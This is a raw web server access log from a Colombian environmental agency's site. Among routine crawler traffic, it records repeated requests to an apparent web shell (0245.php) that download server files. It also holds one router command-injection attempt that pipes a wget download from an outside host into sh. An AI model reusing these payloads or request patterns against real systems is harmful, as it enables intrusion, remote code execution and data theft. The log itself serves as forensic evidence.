47.128.119.206 - - [28/Jun/2024:05:04:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5C&f=wp-login.php&ft=download HTTP/1.1" 200 34241
216.245.221.92 - - [28/Jun/2024:05:04:53 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [28/Jun/2024:05:04:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5748.pdf HTTP/1.1" 200 509847
201.245.192.253 - - [28/Jun/2024:05:05:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.115.32 - - [28/Jun/2024:05:05:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cconfig&f=setup.forms.php&ft=download HTTP/1.1" 200 11060
201.245.192.253 - - [28/Jun/2024:05:05:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.116.90 - - [28/Jun/2024:05:05:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cconfig&f=Validator.class.php&ft=download HTTP/1.1" 200 19856
66.249.66.13 - - [28/Jun/2024:05:05:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1047.pdf HTTP/1.1" 304 -
47.128.117.119 - - [28/Jun/2024:05:05:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=DisplayResults.class.php&ft=download HTTP/1.1" 200 226930
172.22.2.4 - - [28/Jun/2024:05:05:43 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:05:05:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2013.pdf HTTP/1.1" 200 684062
201.245.192.253 - - [28/Jun/2024:05:06:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.22 - - [28/Jun/2024:05:06:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=cleanup.lib.php&ft=download HTTP/1.1" 200 1438
47.128.116.44 - - [28/Jun/2024:05:06:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=session.inc.php&ft=download&white=1 HTTP/1.1" 200 3836
47.128.49.248 - - [28/Jun/2024:05:06:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins%5C&f=ExportPlugin.class.php&ft=download HTTP/1.1" 200 5215
47.128.116.135 - - [28/Jun/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5318.pdf&ft=download&white=1 HTTP/1.1" 200 749223
47.128.121.78 - - [28/Jun/2024:05:07:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=Table.class.php&ft=download HTTP/1.1" 200 64262
201.245.192.253 - - [28/Jun/2024:05:07:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
64.62.197.199 - - [28/Jun/2024:05:07:10 -0500] "\x16\x03\x01" 400 226
47.128.97.20 - - [28/Jun/2024:05:07:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2790.pdf&ft=download&white=1 HTTP/1.1" 200 401063
201.245.192.253 - - [28/Jun/2024:05:07:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [28/Jun/2024:05:07:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1137.pdf HTTP/1.1" 304 -
47.128.97.233 - - [28/Jun/2024:05:07:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=display_export.inc.php&ft=download HTTP/1.1" 200 1703
47.128.30.117 - - [28/Jun/2024:05:07:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=server_users.lib.php&ft=download HTTP/1.1" 200 1371
201.245.192.253 - - [28/Jun/2024:05:08:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:08:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.59.84 - - [28/Jun/2024:05:08:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=phpAE7C.tmp&ft=download HTTP/1.1" 200 97481
47.128.97.247 - - [28/Jun/2024:05:08:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=server_plugins.lib.php&ft=download HTTP/1.1" 200 6209
172.22.2.4 - - [28/Jun/2024:05:06:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [28/Jun/2024:05:08:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4608.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:05:08:50 -0500] "GET /BLA/resoluciones/Autos%202008/2002.pdf HTTP/1.1" 200 180049
201.245.192.253 - - [28/Jun/2024:05:09:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:05:07:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
190.24.56.230 - - [28/Jun/2024:05:09:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 588817
190.24.56.230 - - [28/Jun/2024:05:09:19 -0500] "GET /BLA/resoluciones/AUTOS%202015/4837.pdf HTTP/1.1" 200 640006
201.245.192.253 - - [28/Jun/2024:05:09:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Jun/2024:05:09:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:10:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [28/Jun/2024:05:10:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1271.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:05:10:31 -0500] "GET /BLA/resoluciones/AUTOS%202023/05856.pdf HTTP/1.1" 200 604508
66.249.66.11 - - [28/Jun/2024:05:10:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1918.pdf HTTP/1.1" 200 265413
201.245.192.253 - - [28/Jun/2024:05:11:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:05:11:20 -0500] "GET /galeria/galeria/fotos/Entrenube3G.jpg HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:05:11:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.124.184 - - [28/Jun/2024:05:11:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=db_events.php&ft=download HTTP/1.1" 200 401
201.245.192.253 - - [28/Jun/2024:05:12:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.24.67 - - [28/Jun/2024:05:12:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csuelos&f=footer.php&ft=download HTTP/1.1" 200 557
185.191.127.212 - - [28/Jun/2024:05:12:13 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
47.128.24.76 - - [28/Jun/2024:05:12:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5297.pdf&ft=download&white=1 HTTP/1.1" 200 20135
66.249.66.12 - - [28/Jun/2024:05:12:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0285.pdf HTTP/1.1" 304 -
47.128.45.2 - - [28/Jun/2024:05:12:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5C&f=cumbreclima19092015.zip&ft=download&white=1 HTTP/1.1" 200 -
190.24.56.230 - - [28/Jun/2024:05:12:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 588817
190.24.56.230 - - [28/Jun/2024:05:12:44 -0500] "GET /BLA/resoluciones/AUTOS%202015/4051.pdf HTTP/1.1" 200 780934
47.128.124.137 - - [28/Jun/2024:05:12:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6611.pdf&ft=download&white=1 HTTP/1.1" 200 372391
201.245.192.253 - - [28/Jun/2024:05:13:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:05:13:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.197 - - [28/Jun/2024:05:13:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Font.class.php&ft=download HTTP/1.1" 200 4422
201.245.192.253 - - [28/Jun/2024:05:13:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.111.23 - - [28/Jun/2024:05:13:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=Theme.class.php&ft=download HTTP/1.1" 200 11813
47.128.127.188 - - [28/Jun/2024:05:13:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=PMA.php&ft=download HTTP/1.1" 200 2127
51.8.223.186 - - [28/Jun/2024:05:13:41 -0500] "GET / HTTP/1.1" 200 319
47.128.127.176 - - [28/Jun/2024:05:13:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=sql_query_form.lib.php&ft=download HTTP/1.1" 200 19032
201.245.192.253 - - [28/Jun/2024:05:14:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.136 - - [28/Jun/2024:05:14:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1213.pdf&ft=download&white=1 HTTP/1.1" 200 720551
172.22.2.4 - - [28/Jun/2024:05:12:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.12 - - [28/Jun/2024:05:14:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1535.pdf HTTP/1.1" 304 -
66.249.66.13 - - [28/Jun/2024:05:14:23 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/9-%20INSTRUCTIVO%20DILIGENCIAMIENTO%20REPORTE%20LIBRO%20OPERACIONES.pdf HTTP/1.1" 200 240020
66.249.66.11 - - [28/Jun/2024:05:14:23 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/2-%20SOLICITUD%20DE%20VERIFICACI%C3%93N%20DOCUMENTAL%20Y%20VISITA%20PARA%20LA%20EXPEDICI%C3%93N%20DE%20SUNL.xlsx HTTP/1.1" 200 51583
172.22.2.4 - - [28/Jun/2024:05:14:37 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%205%20del%2026%20de%20Diciembre%20de%202014.pdf HTTP/1.1" 200 3424865
216.245.221.92 - - [28/Jun/2024:05:14:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:15:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:05:13:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
201.245.192.253 - - [28/Jun/2024:05:15:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [28/Jun/2024:05:15:24 -0500] "GET /Publicaciones/2023EE217302.pdf HTTP/1.1" 404 228
69.63.184.5 - - [28/Jun/2024:05:15:36 -0500] "GET /vehiculos-de-cero-o-bajas-emisiones-para-enfrentar-el-cambio-climatico.html HTTP/1.1" 200 743
69.63.184.10 - - [28/Jun/2024:05:15:36 -0500] "GET /vehiculos-de-cero-o-bajas-emisiones-para-enfrentar-el-cambio-climatico.html HTTP/1.1" 200 743
172.22.2.4 - - [28/Jun/2024:05:15:47 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000001%20DEL%2011%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 298890
201.245.192.253 - - [28/Jun/2024:05:16:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:05:16:24 -0500] "GET /autoliquidacion/index.php?dir=Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/&sort=date&order=asc HTTP/1.1" 200 5307
66.249.66.12 - - [28/Jun/2024:05:16:43 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/8-%20INSTRUCTIVO%20DILIGENCIAMIENTO%20LIBRO%20OPERACIONES.pdf HTTP/1.1" 200 146313
201.245.192.253 - - [28/Jun/2024:05:17:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:17:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36680
201.245.192.253 - - [28/Jun/2024:05:17:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35520
201.245.192.253 - - [28/Jun/2024:05:17:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:05:17:24 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20ocupaci%F3n%20de%20cauce/&sort=size&order=asc HTTP/1.1" 200 2870
66.249.66.13 - - [28/Jun/2024:05:17:24 -0500] "GET /BLA/resoluciones/AUTOS%202023/2722.pdf HTTP/1.1" 200 417617
201.245.192.253 - - [28/Jun/2024:05:18:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:05:18:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:05:18:40 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [28/Jun/2024:05:18:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [28/Jun/2024:05:18:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.66.13 - - [28/Jun/2024:05:18:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1122.pdf HTTP/1.1" 200 8078006
201.245.192.253 - - [28/Jun/2024:05:19:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:05:19:04 -0500] "GET /autoliquidacion/Solicitudes%20relacionadas%20con%20ocupaci%C3%B3n%20de%20cauce/Lista%20de%20Chequeo%20Permiso%20Ocupacion%20de%20Cauce.pdf HTTP/1.1" 200 38424
201.245.192.253 - - [28/Jun/2024:05:19:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:05:19:25 -0500] "GET /autoliquidacion/index.php?dir=Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/&sort=name&order=desc HTTP/1.1" 200 5306
201.245.192.253 - - [28/Jun/2024:05:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35197
200.69.67.131 - - [28/Jun/2024:05:19:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201601-1650/00001620.tif HTTP/1.1" 200 207094
172.22.2.4 - - [28/Jun/2024:05:18:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [28/Jun/2024:05:19:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:05:18:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:20:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:20:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35520
47.128.118.196 - - [28/Jun/2024:05:20:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Crte%5C&f=rte_main.inc.php&ft=download HTTP/1.1" 200 2161
47.128.55.113 - - [28/Jun/2024:05:20:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=show_config_errors.php&ft=download HTTP/1.1" 200 1039
172.22.2.4 - - [28/Jun/2024:05:19:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
201.245.192.253 - - [28/Jun/2024:05:21:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.165 - - [28/Jun/2024:05:21:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=tbl_printview.php&ft=download&white=1 HTTP/1.1" 200 1474
201.245.192.253 - - [28/Jun/2024:05:21:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.39.237 - - [28/Jun/2024:05:21:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=Partition.class.php&ft=download HTTP/1.1" 200 2216
66.249.66.11 - - [28/Jun/2024:05:21:24 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/1-%20INSTRUCTIVO%20SOLICITUD%20VERIFICACI%C3%93N%20PARA%20EXPEDICI%C3%93N%20SUNL.pdf HTTP/1.1" 200 953394
66.249.66.12 - - [28/Jun/2024:05:21:37 -0500] "GET /autoliquidacion/index.php?dir=Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/&sort=size&order=asc HTTP/1.1" 200 5307
66.249.66.12 - - [28/Jun/2024:05:21:38 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20ocupaci%F3n%20de%20cauce/&sort=name&order=desc HTTP/1.1" 200 2869
47.128.20.175 - - [28/Jun/2024:05:21:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=display_structure.inc.php&ft=download HTTP/1.1" 200 7280
47.128.124.155 - - [28/Jun/2024:05:21:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1908.pdf&ft=download&white=1 HTTP/1.1" 200 409255
201.245.192.253 - - [28/Jun/2024:05:22:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.97 - - [28/Jun/2024:05:22:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Crte&f=rte_main.inc.php&ft=download HTTP/1.1" 200 2161
17.241.227.39 - - [28/Jun/2024:05:22:20 -0500] "GET /secretaria-de-ambiente-acompanara-socializaciones-de-plan-de-manejo-restauracion-y-recuperacion-ambiental-de-antigua-cantera-en-el-norte-de-bogota.html HTTP/1.1" 200 1030
47.128.118.156 - - [28/Jun/2024:05:22:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5983.pdf&ft=download&white=1 HTTP/1.1" 200 417447
66.249.66.11 - - [28/Jun/2024:05:22:38 -0500] "GET /isolucionsda/Arriba.asp?Pagina=/isolucionsda/bancoconocimiento/R/Resolucion3257de30deoctubrede2007/Resolucion3257de30deoctubrede2007.asp&IdArticulo=1091 HTTP/1.1" 200 527
47.128.27.48 - - [28/Jun/2024:05:22:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3892.pdf&ft=download&white=1 HTTP/1.1" 200 179878
47.128.63.244 - - [28/Jun/2024:05:22:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=database_interface.inc.php&ft=download&white=1 HTTP/1.1" 200 2161
201.245.192.253 - - [28/Jun/2024:05:22:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:05:23:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:23:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:05:23:45 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/3-%20INSTRUCTIVO%20REGISTRO%20DE%20NUEVOS%20USUARIOS%20EN%20LA%20PLATAFORMA%20VITAL.pdf HTTP/1.1" 200 644720
40.77.167.19 - - [28/Jun/2024:05:23:53 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
201.245.192.253 - - [28/Jun/2024:05:24:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:05:24:40 -0500] "GET /isolucionsda/Arriba.asp?Pagina=/isolucionsda/bancoconocimiento/D/Decreto1713del6deagostode2002/Decreto1713del6deagostode2002.asp&IdArticulo=7047 HTTP/1.1" 200 527
66.249.66.11 - - [28/Jun/2024:05:24:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1710.pdf HTTP/1.1" 200 533936
216.245.221.92 - - [28/Jun/2024:05:24:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:25:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:05:25:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:05:24:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:05:26:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:05:26:41 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Evaluaci%F3n%20de%20Estudios%20de%20ruido/&sort=date&order=desc HTTP/1.1" 200 2973
47.128.51.36 - - [28/Jun/2024:05:26:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024%5C&f=00447.pdf&ft=download&white=1 HTTP/1.1" 200 503462
172.22.2.4 - - [28/Jun/2024:05:25:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
47.128.110.70 - - [28/Jun/2024:05:26:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=ClipMarchaWEB.flv&ft=download&white=1 HTTP/1.1" 200 11685532
201.245.192.253 - - [28/Jun/2024:05:27:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.50.57 - - [28/Jun/2024:05:27:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=custom-header.php&ft=download HTTP/1.1" 200 43006
201.245.192.253 - - [28/Jun/2024:05:27:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36680
201.245.192.253 - - [28/Jun/2024:05:27:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35520
201.245.192.253 - - [28/Jun/2024:05:27:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.51.240 - - [28/Jun/2024:05:27:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=ms-blogs.php&ft=download HTTP/1.1" 200 20132
66.249.66.13 - - [28/Jun/2024:05:27:41 -0500] "GET /autoliquidacion/Solicitudes%20relacionadas%20con%20ocupaci%C3%B3n%20de%20cauce/Aplicativo.html HTTP/1.1" 200 359
47.128.18.42 - - [28/Jun/2024:05:27:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Csendmail%5C&f=libeay32.dll&ft=download&white=1 HTTP/1.1" 200 20130
201.245.192.253 - - [28/Jun/2024:05:27:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.127.46 - - [28/Jun/2024:05:28:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=relation.lib.php&ft=download HTTP/1.1" 200 20128
201.245.192.253 - - [28/Jun/2024:05:28:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:05:28:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [28/Jun/2024:05:28:06 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
181.58.62.22 - - [28/Jun/2024:05:28:07 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
